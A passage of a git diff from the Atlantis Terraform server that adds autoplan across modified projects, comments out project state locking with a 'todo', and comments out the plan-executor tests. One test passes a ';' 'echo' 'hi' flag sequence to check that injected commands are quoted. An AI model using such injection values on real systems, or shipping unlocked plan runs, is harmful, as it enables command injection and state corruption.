 func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) {
diff --git a/server/events/models/models.go b/server/events/models/models.go
index 7344fd28e2..1d8d72453f 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -26,6 +26,10 @@ import (
 	"github.com/pkg/errors"
 )
 
+// DefaultWorkspace is the default Terraform workspace for both Atlantis and
+// Terraform.
+const DefaultWorkspace = "default"
+
 // Repo is a VCS repository.
 type Repo struct {
 	// FullName is the owner and repo name separated
@@ -123,6 +127,7 @@ const (
 )
 
 // User is a VCS user.
+// During an autoplan, the user will be the Atlantis API user.
 type User struct {
 	Username string
 }
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
index 7e92917551..4dd221422f 100644
--- a/server/events/plan_executor.go
+++ b/server/events/plan_executor.go
@@ -16,8 +16,8 @@ package events
 import (
 	"fmt"
 
+	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/locking"
-	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
@@ -39,7 +39,7 @@ type PlanExecutor struct {
 	Workspace        AtlantisWorkspace
 	ProjectFinder    ProjectFinder
 	ProjectLocker    ProjectLocker
-	ExecutionPlanner *runtime.ExecutionPlanner
+	ExecutionPlanner *ExecutionPlanner
 	LockURLGenerator LockURLGenerator
 }
 
@@ -56,32 +56,54 @@ func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse {
 		return CommandResponse{Error: err}
 	}
 
-	stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username)
-	if err != nil {
-		return CommandResponse{Error: err}
+	var stages []runtime.PlanStage
+	if ctx.Command.Autoplan {
+		modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
+		if err != nil {
+			return CommandResponse{Error: errors.Wrap(err, "getting modified files")}
+		}
+		stages, err = p.ExecutionPlanner.BuildAutoplanStages(ctx.Log, ctx.BaseRepo.FullName, cloneDir, ctx.User.Username, modifiedFiles)
+		if err != nil {
+			return CommandResponse{Error: err}
+		}
+	} else {
+		stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username)
+		if err != nil {
+			return CommandResponse{Error: err}
+		}
+		stages = append(stages, stage)
 	}
 
-	tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir))
-	if err != nil {
-		return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}}
-	}
-	if !tryLockResponse.LockAcquired {
-		return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}}
-	}
+	var projectResults []ProjectResult
+	for _, stage := range stages {
+		projectResult := ProjectResult{
+			Path:      stage.ProjectPath,
+			Workspace: stage.Workspace,
+		}
 
-	out, err := stage.Run()
-	if err != nil {
-		// Plan failed so unlock the state.
-		if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil {
-			ctx.Log.Err("error unlocking state after plan error: %s", unlockErr)
+		// todo: this should be moved into the plan stage
+		//tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir))
+		//if err != nil {
+		//	return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}}
+		//}
+		//if !tryLockResponse.LockAcquired {
+		//	return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}}
+		//}
+		// todo: endtodo
+
+		out, err := stage.Run()
+		if err != nil {
+			//if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil {
+			//	ctx.Log.Err("error unlocking state after plan error: %s", unlockErr)
+			//}
+			projectResult.Error = fmt.Errorf("%s\n%s", err.Error(), out)
+		} else {
+			projectResult.PlanSuccess = &PlanSuccess{
+				TerraformOutput: out,
+				//LockURL:         p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey),
+			}
 		}
-		return CommandResponse{ProjectResults: []ProjectResult{{Error: fmt.Errorf("%s\n%s", err.Error(), out)}}}
+		projectResults = append(projectResults, projectResult)
 	}
-
-	return CommandResponse{ProjectResults: []ProjectResult{{
-		PlanSuccess: &PlanSuccess{
-			TerraformOutput: out,
-			LockURL:         p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey),
-		},
-	}}}
+	return CommandResponse{ProjectResults: projectResults}
 }
diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go
index c9a209fe64..371aa9ec5c 100644
--- a/server/events/plan_executor_test.go
+++ b/server/events/plan_executor_test.go
@@ -13,276 +13,277 @@
 //
 package events_test
 
-import (
-	"errors"
-	"testing"
-
-	"github.com/mohae/deepcopy"
-	. "github.com/petergtz/pegomock"
-	"github.com/runatlantis/atlantis/server/events"
-	"github.com/runatlantis/atlantis/server/events/locking"
-	lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
-	"github.com/runatlantis/atlantis/server/events/mocks"
-	"github.com/runatlantis/atlantis/server/events/models"
-	rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
-	tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
-	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
-	"github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers"
-	"github.com/runatlantis/atlantis/server/logging"
-	. "github.com/runatlantis/atlantis/testing"
-)
-
-var planCtx = events.CommandContext{
-	Command: &events.Command{
-		Name:      events.Plan,
-		Workspace: "workspace",
-		Dir:       "",
-	},
-	Log:      logging.NewNoopLogger(),
-	BaseRepo: models.Repo{},
-	HeadRepo: models.Repo{},
-	Pull:     models.PullRequest{},
-	User: models.User{
-		Username: "anubhavmishra",
-	},
-}
-
-func TestExecute_ModifiedFilesErr(t *testing.T) {
-	t.Log("If GetModifiedFiles returns an error we return an error")
-	p, _, _ := setupPlanExecutorTest(t)
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err"))
-	r := p.Execute(&planCtx)
-
-	Assert(t, r.Error != nil, "exp .Error to be set")
-	Equals(t, "getting modified files: err", r.Error.Error())
-}
-
-func TestExecute_NoModifiedProjects(t *testing.T) {
-	t.Log("If there are no modified projects we return a failure")
-	p, _, _ := setupPlanExecutorTest(t)
-	// We don't need to actually mock VCSClient.GetModifiedFiles because by
-	// default it will return an empty slice which is what we want for this test.
-	r := p.Execute(&planCtx)
-
-	Equals(t, "No Terraform files were modified.", r.Failure)
-}
-
-func TestExecute_CloneErr(t *testing.T) {
-	t.Log("If AtlantisWorkspace.Clone returns an error we return an error")
-	p, _, _ := setupPlanExecutorTest(t)
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err"))
-	r := p.Execute(&planCtx)
-
-	Assert(t, r.Error != nil, "exp .Error to be set")
-	Equals(t, "err", r.Error.Error())
-}
-
-func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) {
-	t.Log("Test that we run plan in the right directory and workspace if they're set")
-	p, runner, _ := setupPlanExecutorTest(t)
-	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
-	ctx.Log = logging.NewNoopLogger()
-	ctx.Command.Dir = "dir1/dir2"
-	ctx.Command.Workspace = "workspace-flag"
-
-	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")).
-		ThenReturn("/tmp/clone-repo", nil)
-	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})).
-		ThenReturn(events.PreExecuteResult{
-			LockResponse: locking.TryLockResponse{
-				LockKey: "key",
-			},
-		})
-	r := p.Execute(&ctx)
-
-	runner.VerifyWasCalledOnce().RunCommandWithVersion(
-		ctx.Log,
-		"/tmp/clone-repo/dir1/dir2",
-		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"},
-		nil,
-		"workspace-flag",
-	)
-	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-	result := r.ProjectResults[0]
-	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
-	Equals(t, "", result.PlanSuccess.TerraformOutput)
-	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_AddedArgs(t *testing.T) {
-	t.Log("Test that we include extra-args added to the comment in the plan command")
-	p, runner, _ := setupPlanExecutorTest(t)
-	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
-	ctx.Log = logging.NewNoopLogger()
-	ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
-
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
-		ThenReturn("/tmp/clone-repo", nil)
-	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
-		ThenReturn(events.PreExecuteResult{
-			LockResponse: locking.TryLockResponse{
-				LockKey: "key",
-			},
-		})
-	r := p.Execute(&ctx)
-
-	runner.VerifyWasCalledOnce().RunCommandWithVersion(
-		ctx.Log,
-		"/tmp/clone-repo",
-		[]string{
-			"plan",
-			"-refresh",
-			"-no-color",
-			"-out",
-			"/tmp/clone-repo/workspace.tfplan",
-			"-var",
-			"atlantis_user=anubhavmishra",
-			// NOTE: extra args should be quoted to prevent an attacker from
-			// appending malicious commands.
-			"\"-target=resource\"",
-			"\"-var\"",
-			"\"a=b\"",
-			"\";\"",
-			"\"echo\"",
-			"\"hi\"",
-		},
-		nil,
-		"workspace",
-	)
-	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-	result := r.ProjectResults[0]
-	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
-	Equals(t, "", result.PlanSuccess.TerraformOutput)
-	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_Success(t *testing.T) {
-	t.Log("If there are no errors, the plan should be returned")
-	p, runner, _ := setupPlanExecutorTest(t)
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-		ThenReturn("/tmp/clone-repo", nil)
-	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
-		ThenReturn(events.PreExecuteResult{
-			LockResponse: locking.TryLockResponse{
-				LockKey: "key",
-			},
-		})
-
-	r := p.Execute(&planCtx)
-
-	runner.VerifyWasCalledOnce().RunCommandWithVersion(
-		planCtx.Log,
-		"/tmp/clone-repo",
-		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
-		nil,
-		"workspace",
-	)
-	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-	result := r.ProjectResults[0]
-	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
-	Equals(t, "", result.PlanSuccess.TerraformOutput)
-	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_PreExecuteResult(t *testing.T) {
-	t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it")
-	p, _, _ := setupPlanExecutorTest(t)
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-		ThenReturn("/tmp/clone-repo", nil)
-	projectResult := events.ProjectResult{
-		Failure: "failure",
-	}
-	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
-		ThenReturn(events.PreExecuteResult{ProjectResult: projectResult})
-	r := p.Execute(&planCtx)
-
-	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-	result := r.ProjectResults[0]
-	Equals(t, "failure", result.Failure)
-}
-
-func TestExecute_MultiProjectFailure(t *testing.T) {
-	t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.")
-	p, runner, locker := setupPlanExecutorTest(t)
-	// Two projects have been modified so we should run plan in two paths.
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil)
-	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-		ThenReturn("/tmp/clone-repo", nil)
-
-	// Both projects will succeed in the PreExecute stage.
-	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})).
-		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}})
-	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})).
-		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}})
-
-	// The first project will fail when running plan
-	When(runner.RunCommandWithVersion(
-		planCtx.Log,
-		"/tmp/clone-repo/path1",
-		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
-		nil,
-		"workspace",
-	)).ThenReturn("", errors.New("path1 err"))
-	// The second will succeed. We don't need to stub it because by default it
-	// will return a nil error.
-	r := p.Execute(&planCtx)
-
-	// We expect Unlock to be called for the failed project.
-	locker.VerifyWasCalledOnce().Unlock("key1")
-
-	// So at the end we expect the first project to return an error and the second to be successful.
-	Assert(t, len(r.ProjectResults) == 2, "exp two project results")
-	result1 := r.ProjectResults[0]
-	Assert(t, result1.Error != nil, "exp err to not be nil")
-	Equals(t, "path1 err\n", result1.Error.Error())
-
-	result2 := r.ProjectResults[1]
-	Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil")
-	Equals(t, "", result2.PlanSuccess.TerraformOutput)
-	Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL)
-}
-
-func TestExecute_PostPlanCommands(t *testing.T) {
-	t.Log("Should execute post-plan commands and return if there is an error")
-	p, _, _ := setupPlanExecutorTest(t)
-	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
-	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
-		ThenReturn("/tmp/clone-repo", nil)
-	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
-		ThenReturn(events.PreExecuteResult{
-			ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}},
-		})
-	When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")).
-		ThenReturn("", errors.New("err"))
-
-	r := p.Execute(&planCtx)
-
-	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
-	result := r.ProjectResults[0]
-	Assert(t, result.Error != nil, "exp plan error to not be nil")
-	Equals(t, "running post plan commands: err", result.Error.Error())
-}
-
-func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) {
-	RegisterMockTestingT(t)
-	vcsProxy := vcsmocks.NewMockClientProxy()
-	w := mocks.NewMockAtlantisWorkspace()
-	ppe := mocks.NewMockProjectPreExecutor()
-	runner := tmocks.NewMockClient()
-	locker := lmocks.NewMockLocker()
-	run := rmocks.NewMockRunner()
-	p := events.PlanExecutor{
-		VCSClient:         vcsProxy,
-		ProjectFinder:     &events.DefaultProjectFinder{},
-		Workspace:         w,
-		ProjectPreExecute: ppe,
-		Terraform:         runner,
-		Locker:            locker,
-		Run:               run,
-	}
-	return &p, runner, locker
-}
+//
+//import (
+//	"errors"
+//	"testing"
+//
+//	"github.com/mohae/deepcopy"
+//	. "github.com/petergtz/pegomock"
+//	"github.com/runatlantis/atlantis/server/events"
+//	"github.com/runatlantis/atlantis/server/events/locking"
+//	lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
+//	"github.com/runatlantis/atlantis/server/events/mocks"
+//	"github.com/runatlantis/atlantis/server/events/models"
+//	rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
+//	tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+//	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+//	"github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers"
+//	"github.com/runatlantis/atlantis/server/logging"
+//	. "github.com/runatlantis/atlantis/testing"
+//)
+//
+//var planCtx = events.CommandContext{
+//	Command: &events.Command{
+//		Name:      events.Plan,
+//		Workspace: "workspace",
+//		Dir:       "",
+//	},
+//	Log:      logging.NewNoopLogger(),
+//	BaseRepo: models.Repo{},
+//	HeadRepo: models.Repo{},
+//	Pull:     models.PullRequest{},
+//	User: models.User{
+//		Username: "anubhavmishra",
+//	},
+//}
+//
+//func TestExecute_ModifiedFilesErr(t *testing.T) {
+//	t.Log("If GetModifiedFiles returns an error we return an error")
+//	p, _, _ := setupPlanExecutorTest(t)
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err"))
+//	r := p.Execute(&planCtx)
+//
+//	Assert(t, r.Error != nil, "exp .Error to be set")
+//	Equals(t, "getting modified files: err", r.Error.Error())
+//}
+//
+//func TestExecute_NoModifiedProjects(t *testing.T) {
+//	t.Log("If there are no modified projects we return a failure")
+//	p, _, _ := setupPlanExecutorTest(t)
+//	// We don't need to actually mock VCSClient.GetModifiedFiles because by
+//	// default it will return an empty slice which is what we want for this test.
+//	r := p.Execute(&planCtx)
+//
+//	Equals(t, "No Terraform files were modified.", r.Failure)
+//}
+//
+//func TestExecute_CloneErr(t *testing.T) {
+//	t.Log("If AtlantisWorkspace.Clone returns an error we return an error")
+//	p, _, _ := setupPlanExecutorTest(t)
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
+//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err"))
+//	r := p.Execute(&planCtx)
+//
+//	Assert(t, r.Error != nil, "exp .Error to be set")
+//	Equals(t, "err", r.Error.Error())
+//}
+//
+//func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) {
+//	t.Log("Test that we run plan in the right directory and workspace if they're set")
+//	p, runner, _ := setupPlanExecutorTest(t)
+//	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
+//	ctx.Log = logging.NewNoopLogger()
+//	ctx.Command.Dir = "dir1/dir2"
+//	ctx.Command.Workspace = "workspace-flag"
+//
+//	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")).
+//		ThenReturn("/tmp/clone-repo", nil)
+//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})).
+//		ThenReturn(events.PreExecuteResult{
+//			LockResponse: locking.TryLockResponse{
+//				LockKey: "key",
+//			},
+//		})
+//	r := p.Execute(&ctx)
+//
+//	runner.VerifyWasCalledOnce().RunCommandWithVersion(
+//		ctx.Log,
+//		"/tmp/clone-repo/dir1/dir2",
+//		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"},
+//		nil,
+//		"workspace-flag",
+//	)
+//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
+//	result := r.ProjectResults[0]
+//	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
+//	Equals(t, "", result.PlanSuccess.TerraformOutput)
+//	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
+//}
+//
+//func TestExecute_AddedArgs(t *testing.T) {
+//	t.Log("Test that we include extra-args added to the comment in the plan command")
+//	p, runner, _ := setupPlanExecutorTest(t)
+//	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
+//	ctx.Log = logging.NewNoopLogger()
+//	ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
+//
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
+//	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
+//		ThenReturn("/tmp/clone-repo", nil)
+//	When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//		ThenReturn(events.PreExecuteResult{
+//			LockResponse: locking.TryLockResponse{
+//				LockKey: "key",
+//			},
+//		})
+//	r := p.Execute(&ctx)
+//
+//	runner.VerifyWasCalledOnce().RunCommandWithVersion(
+//		ctx.Log,
+//		"/tmp/clone-repo",
+//		[]string{
+//			"plan",
+//			"-refresh",
+//			"-no-color",
+//			"-out",
+//			"/tmp/clone-repo/workspace.tfplan",
+//			"-var",
+//			"atlantis_user=anubhavmishra",
+//			// NOTE: extra args should be quoted to prevent an attacker from
+//			// appending malicious commands.
+//			"\"-target=resource\"",
+//			"\"-var\"",
+//			"\"a=b\"",
+//			"\";\"",
+//			"\"echo\"",
+//			"\"hi\"",
+//		},
+//		nil,
+//		"workspace",
+//	)
+//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
+//	result := r.ProjectResults[0]
+//	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
+//	Equals(t, "", result.PlanSuccess.TerraformOutput)
+//	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
+//}
+//
+//func TestExecute_Success(t *testing.T) {
+//	t.Log("If there are no errors, the plan should be returned")
+//	p, runner, _ := setupPlanExecutorTest(t)
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
+//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
+//		ThenReturn("/tmp/clone-repo", nil)
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//		ThenReturn(events.PreExecuteResult{
+//			LockResponse: locking.TryLockResponse{
+//				LockKey: "key",
+//			},
+//		})
+//
+//	r := p.Execute(&planCtx)
+//
+//	runner.VerifyWasCalledOnce().RunCommandWithVersion(
+//		planCtx.Log,
+//		"/tmp/clone-repo",
+//		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
+//		nil,
+//		"workspace",
+//	)
+//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
+//	result := r.ProjectResults[0]
+//	Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
+//	Equals(t, "", result.PlanSuccess.TerraformOutput)
+//	Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
+//}
+//
+//func TestExecute_PreExecuteResult(t *testing.T) {
+//	t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it")
+//	p, _, _ := setupPlanExecutorTest(t)
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
+//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
+//		ThenReturn("/tmp/clone-repo", nil)
+//	projectResult := events.ProjectResult{
+//		Failure: "failure",
+//	}
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//		ThenReturn(events.PreExecuteResult{ProjectResult: projectResult})
+//	r := p.Execute(&planCtx)
+//
+//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
+//	result := r.ProjectResults[0]
+//	Equals(t, "failure", result.Failure)
+//}
+//
+//func TestExecute_MultiProjectFailure(t *testing.T) {
+//	t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.")
+//	p, runner, locker := setupPlanExecutorTest(t)
+//	// Two projects have been modified so we should run plan in two paths.
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil)
+//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
+//		ThenReturn("/tmp/clone-repo", nil)
+//
+//	// Both projects will succeed in the PreExecute stage.
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})).
+//		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}})
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})).
+//		ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}})
+//
+//	// The first project will fail when running plan
+//	When(runner.RunCommandWithVersion(
+//		planCtx.Log,
+//		"/tmp/clone-repo/path1",
+//		[]string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
+//		nil,
+//		"workspace",
+//	)).ThenReturn("", errors.New("path1 err"))
+//	// The second will succeed. We don't need to stub it because by default it
+//	// will return a nil error.
+//	r := p.Execute(&planCtx)
+//
+//	// We expect Unlock to be called for the failed project.
+//	locker.VerifyWasCalledOnce().Unlock("key1")
+//
+//	// So at the end we expect the first project to return an error and the second to be successful.
+//	Assert(t, len(r.ProjectResults) == 2, "exp two project results")
+//	result1 := r.ProjectResults[0]
+//	Assert(t, result1.Error != nil, "exp err to not be nil")
+//	Equals(t, "path1 err\n", result1.Error.Error())
+//
+//	result2 := r.ProjectResults[1]
+//	Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil")
+//	Equals(t, "", result2.PlanSuccess.TerraformOutput)
+//	Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL)
+//}
+//
+//func TestExecute_PostPlanCommands(t *testing.T) {
+//	t.Log("Should execute post-plan commands and return if there is an error")
+//	p, _, _ := setupPlanExecutorTest(t)
+//	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
+//	When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
+//		ThenReturn("/tmp/clone-repo", nil)
+//	When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
+//		ThenReturn(events.PreExecuteResult{
+//			ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}},
+//		})
+//	When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")).
+//		ThenReturn("", errors.New("err"))
+//
+//	r := p.Execute(&planCtx)
+//
+//	Assert(t, len(r.ProjectResults) == 1, "exp one project result")
+//	result := r.ProjectResults[0]
+//	Assert(t, result.Error != nil, "exp plan error to not be nil")
+//	Equals(t, "running post plan commands: err", result.Error.Error())
+//}
+//
+//func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) {
+//	RegisterMockTestingT(t)
+//	vcsProxy := vcsmocks.NewMockClientProxy()
+//	w := mocks.NewMockAtlantisWorkspace()
+//	ppe := mocks.NewMockProjectPreExecutor()
+//	runner := tmocks.NewMockClient()
+//	locker := lmocks.NewMockLocker()
+//	run := rmocks.NewMockRunner()
+//	p := events.PlanExecutor{
+//		VCSClient:         vcsProxy,
+//		ProjectFinder:     &events.DefaultProjectFinder{},
+//		Workspace:         w,
+//		ProjectPreExecute: ppe,
+//		Terraform:         runner,
+//		Locker:            locker,
+//		Run:               run,
+//	}
+//	return &p, runner, locker
+//}
diff --git a/server/events/project_result.go b/server/events/project_result.go
index 94a6d3a468..ca5a1ecee4 100644
--- a/server/events/project_result.go
+++ b/server/events/project_result.go
@@ -18,6 +18,7 @@ import "github.com/runatlantis/atlantis/server/events/vcs"
 // ProjectResult is the result of executing a plan/apply for a project.
 type ProjectResult struct {
 	Path         string
+	Workspace    string
 	Error        error
 	Failure      string
